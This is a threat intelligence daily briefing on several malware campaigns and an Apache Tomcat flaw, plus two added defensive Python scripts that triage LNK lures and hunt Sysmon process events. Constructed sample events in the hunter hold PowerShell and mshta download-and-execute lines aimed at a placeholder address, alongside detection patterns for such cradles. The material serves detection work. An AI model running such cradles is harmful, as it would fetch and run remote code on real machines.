Cyware Daily Threat Intelligence, March 31, 2025


Daily Threat Briefing March 31, 2025

A deceptive Zoom installer was the entry point for a carefully executed BlackSuit ransomware attack. The attackers spent roughly nine days inside the network, about 194 hours from first access to encryption, combining stealth, staging, and social engineering.

CISA has released an analysis of a new malware named RESURGE, which targets CVE-2025-0282, a known vulnerability in Ivanti Connect Secure appliances. RESURGE operates like a rootkit, allowing attackers to create web shells, steal credentials, and establish persistence through SSH tunnels. The underlying vulnerability allows unauthenticated remote code execution and is listed in CISA's KEV catalog.

A new Android banking trojan called Crocodilus uses fake alerts to trick users into handing over their crypto wallet seed phrases. Disguised as a warning to back up recovery keys, the malware relies on social engineering to gain full access to wallets. The threat has so far targeted users in Turkey and Spain.

Top Malware Reported in the Last 24 Hours

Earth Alux hits critical industries

A cyberespionage campaign by the China-linked Earth Alux APT group relied on a primary backdoor called VARGEIT. The backdoor can load tools directly from its C2 server into a spawned mspaint.exe process, so the tooling never has to be written to disk under its own name. VARGEIT is used as a first, second, and/or later-stage backdoor, while COBEACON is employed only as a first-stage backdoor. The group primarily targeted the Asia Pacific and Latin American regions, hitting critical industries including government, technology, logistics, manufacturing, telecommunications, IT services, and retail.

ClickFix Captcha leveraged for malware delivery

Cybercriminals are using a fake-CAPTCHA social engineering technique known as ClickFix to spread malware, including info-stealers, ransomware, and the Qakbot banking trojan. Victims are redirected to a fake CAPTCHA page that instructs them to press Windows Key + R, paste a command the page has already placed on the clipboard, and press Enter; the command downloads malware from attacker-controlled domains. Because the victim runs the command themselves under their own account, no exploit is involved, and the technique remains effective even after individual domains are taken down. The Run dialog is hosted by explorer.exe, so the launch shows up in telemetry as explorer.exe starting PowerShell, mshta, or cmd with a download cradle on the command line.

Bogus Zoom launches BlackSuit ransomware

In a well-planned cyberattack, hackers used a bogus Zoom download to enter a corporate network and spent nine days inside before launching the BlackSuit ransomware. The attackers combined stealth and social engineering for maximum impact. On the ninth day, the intruders used tools like Brute Ratel and Cobalt Strike for reconnaissance and credential dumping. They exfiltrated nearly 1GB of data and executed the ransomware across the network, deleting shadow copies and leaving a ransom note. The entire intrusion, from initial access to encryption, took about 194 hours.

Gamaredon campaign distributes Remcos RAT

A phishing campaign is targeting entities in Ukraine to spread the Remcos remote access trojan. The phishing emails carry ZIP files containing Windows shortcut (.lnk) files disguised as Microsoft Office documents about the Russo-Ukrainian war and military actions. Opening a shortcut runs a PowerShell downloader that connects to servers in Russia and Germany and fetches a ZIP file containing the Remcos backdoor. Researchers linked this activity to the Russian hacking group Gamaredon, which has been active since 2013 and is connected to the Russian Federal Security Service (FSB).
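The delivery chain above (ZIP, then a shortcut posing as a document, then a PowerShell downloader) is easy to triage at the mail gateway before anything is opened. The following is an added example, not code from the briefing or from the researchers who analysed the campaign: it inspects a ZIP attachment for shortcut entries, flags a document extension sitting in front of .lnk (or a shortcut whose name hides the .lnk entirely), and scans the shortcut's data for PowerShell download-cradle strings. The indicator list and the sample archive are constructed; the stub shortcuts carry only the ShellLinkHeader magic and a UTF-16LE argument string, not a full shortcut structure.

```python
"""Triage a ZIP attachment for Windows shortcut (.lnk) lures posing as Office documents.

Added example; indicator list and sample archive are constructed for illustration.
"""
from __future__ import annotations

import io
import re
import zipfile

# ShellLinkHeader: HeaderSize 0x4C followed by LinkCLSID 00021401-0000-0000-C000-000000000046.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
DOC_EXTS = (".doc", ".docx", ".xls", ".xlsx", ".pdf", ".rtf")
# Fragments typical of a PowerShell downloader in the shortcut's argument string (assumed list).
SUSPICIOUS = [re.compile(p, re.I) for p in
              (r"powershell", r"-enc", r"-w\s+hidden", r"\biex\b", r"downloadstring", r"invoke-webrequest")]


def shortcut_text(blob: bytes) -> str:
    """Decode as UTF-16LE at both byte alignments; LNK string data may start at an odd offset."""
    return blob.decode("utf-16-le", errors="ignore") + blob[1:].decode("utf-16-le", errors="ignore")


def triage_zip(data: bytes) -> list[dict]:
    """Return one finding per shortcut-like entry, with the reasons it was flagged."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            lower = info.filename.lower()
            blob = zf.read(info)
            has_magic = blob.startswith(LNK_MAGIC)
            if not (has_magic or lower.endswith(".lnk")):
                continue  # not a shortcut by name or by content
            reasons = []
            if has_magic and not lower.endswith(".lnk"):
                reasons.append("lnk_magic_without_lnk_extension")
            stem = lower[:-4] if lower.endswith(".lnk") else lower
            if stem.endswith(DOC_EXTS):
                reasons.append("document_extension_lure")
            hits = sorted(p.pattern for p in SUSPICIOUS if p.search(shortcut_text(blob)))
            if hits:
                reasons.append("suspicious_args:" + ",".join(hits))
            findings.append({"name": info.filename, "size": info.file_size, "reasons": reasons})
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample: one lure shortcut, one benign text file, one shortcut renamed to .pdf."""
    def stub_lnk(args: str) -> bytes:
        # Header magic, zero padding to the 0x4C-byte header size, then a UTF-16LE argument string.
        return LNK_MAGIC + b"\x00" * (0x4C - len(LNK_MAGIC)) + args.encode("utf-16-le")

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Report_on_military_actions.docx.lnk",
                    stub_lnk("powershell -w hidden -enc AAAA"))  # the base64 is arbitrary filler
        zf.writestr("readme.txt", "nothing to see")
        zf.writestr("invoice.pdf", stub_lnk(""))
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_archive()):
        print(finding)
```

Blocking on the .lnk extension alone is not enough: Windows honours the shortcut by content, and Explorer hides the .lnk suffix, which is why the check also looks at the header magic and at what is in front of the extension.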

Crocodilus malware hits Turkey and Spain

A new Android malware called Crocodilus tricks users into revealing their cryptocurrency wallet seed phrase by warning them to back up their key or lose access. This banking trojan can take over devices, steal data, and allow remote control, abusing the Android Accessibility Service to read the screen and act on the user's behalf. Researchers found it spreads through a dropper that bypasses Android's built-in protections. Once the fake warning has guided the victim to display the seed phrase, the attackers capture it and can control and drain the wallet. Initially targeting users in Turkey and Spain, it may expand soon.

Top Vulnerabilities Reported in the Last 24 Hours

Critical Apache Tomcat flaw patched

A critical RCE vulnerability, CVE-2025-24813, is being actively exploited in Apache Tomcat servers. Where the default servlet is write-enabled (readonly=false, which is off by default) and partial PUT support is enabled (on by default), an unauthenticated HTTP PUT can write a file under the web application; with file-based session persistence and a deserialization gadget library on the classpath, that file is deserialized on a later request, resulting in code execution. Affected versions include 9.0.0-M1 to 9.0.98, 10.1.0-M1 to 10.1.34, and 11.0.0-M1 to 11.0.2; the fixes are in 9.0.99, 10.1.35, and 11.0.3. Exploitation attempts were observed quickly in Latvia, Italy, the U.S., and China, with most attacks targeting U.S. systems. Organizations should upgrade, keep the default servlet read-only or disable partial PUT support, and monitor access logs for unexpected PUT requests.

CISA warns of RESURGE malware

CISA released a Malware Analysis Report on a new malware, dubbed RESURGE, that targets CVE-2025-0282 in Ivanti Connect Secure appliances. RESURGE shares capabilities with the SPAWNCHIMERA variant, including surviving reboots, but carries distinctive commands that alter its behavior. The malware creates web shells, manipulates integrity checks, and enables credential theft and unauthorized account creation. CISA added CVE-2025-0282 to its KEV catalog in January 2025; when exploited, it allows remote code execution for unauthenticated attackers. The agency reports that RESURGE acts as a rootkit and creates secure tunnels for attackers via SSH.

Top Scams Reported in the Last 24 Hours

Lazarus abuses the ClickFix scheme

Lazarus has been targeting the cryptocurrency industry since 2017 to fund the North Korean regime, using a wide range of tools and malware and adapting quickly to avoid detection. A recent investigation uncovered a campaign named ClickFake Interview, which uses convincing fake job interview websites to install backdoors on Windows and macOS through the ClickFix technique. On Windows, a VBS script executes the GolangGhost backdoor via NodeJS. On macOS, a Bash script performs the same role, stealing the system password before launching GolangGhost for data theft. Analysts believe this campaign continues the Contagious Interview activity seen since November 2023, now focused on centralized finance rather than decentralized finance (DeFi). The fake job offers aim at non-technical cryptocurrency employees, likely to evade detection.
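Both the ClickFix campaign in the malware section and the ClickFake Interview campaign above end in the same kind of telemetry: a user-facing process launching a scripting host or Node.js with a download-and-execute step. The following is an added example, not code from the briefing or from the researchers who reported either campaign, and it serves both passages. It runs three hunting rules over constructed Sysmon Event ID 1-style records supplied as JSON lines (the field names Image, ParentImage, CommandLine and EventRecordID follow Sysmon's). The executable and indicator lists are assumptions meant to be tuned locally; the paths and addresses in the sample events are constructed.

```python
"""Hunt process-creation telemetry for ClickFix-style and ClickFake-Interview-style launches.

Added example; the sample events and indicator lists are constructed for illustration.
"""
from __future__ import annotations

import json
import re
from typing import Iterable

# Binaries a victim is typically told to run from the Run dialog (assumed list).
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe",
           "bitsadmin.exe", "certutil.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Download-and-execute fragments commonly pasted into the Run dialog (assumed list).
CRADLE = re.compile(
    r"https?://|\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b"
    r"|-enc(odedcommand)?\b|frombase64string|\bcurl\b", re.I)
# Staging directories a user can write to without elevation.
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Downloads|Public)\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Return the names of every rule the event matches, sorted so output is stable."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    rules = []
    # ClickFix: the Run dialog is hosted by explorer.exe, so the pasted command shows up as
    # explorer.exe -> <lolbin> with a cradle on the command line. Parent alone is too noisy
    # (explorer.exe also parents every double-clicked file), hence the command-line test.
    if parent == "explorer.exe" and image in LOLBINS and CRADLE.search(cmdline):
        rules.append("clickfix_run_dialog_cradle")
    # ClickFake Interview (Windows): a VBS dropper runs the backdoor through Node.js.
    if parent in SCRIPT_HOSTS and image == "node.exe":
        rules.append("script_host_spawns_node")
    # Node running a script out of a user-writable staging directory rather than a project tree.
    if image == "node.exe" and USER_WRITABLE.search(cmdline):
        rules.append("node_script_in_user_writable_dir")
    return sorted(rules)


def scan(lines: Iterable[str]) -> list[tuple[int, str]]:
    """Evaluate every non-empty JSON line and return (EventRecordID, rule) pairs in input order."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        event = json.loads(line)
        for rule in evaluate(event):
            hits.append((int(event["EventRecordID"]), rule))
    return hits


# Constructed sample events; 203.0.113.0/24 is a documentation address range.
SAMPLE_EVENTS = r'''
{"EventRecordID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c \"iex (iwr 'http://203.0.113.7/v.ps1')\""}
{"EventRecordID": 2, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c dir C:\\Users\\jdoe\\Downloads"}
{"EventRecordID": 3, "ParentImage": "C:\\Windows\\System32\\wscript.exe", "Image": "C:\\Program Files\\nodejs\\node.exe", "CommandLine": "node C:\\Users\\jdoe\\AppData\\Local\\Temp\\app.js"}
{"EventRecordID": 4, "ParentImage": "C:\\Program Files\\Microsoft VS Code\\Code.exe", "Image": "C:\\Program Files\\nodejs\\node.exe", "CommandLine": "node C:\\Users\\jdoe\\projects\\api\\server.js"}
{"EventRecordID": 5, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://203.0.113.7/verify.hta"}
'''

if __name__ == "__main__":
    for record, rule in scan(SAMPLE_EVENTS.splitlines()):
        print(f"record {record}: {rule}")
```

Records 2 and 4 are the controls: a plain cmd launched from Explorer and Node started by an editor in a project directory produce no alert, which is the false-positive budget a rule like this has to stay within on developer workstations.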
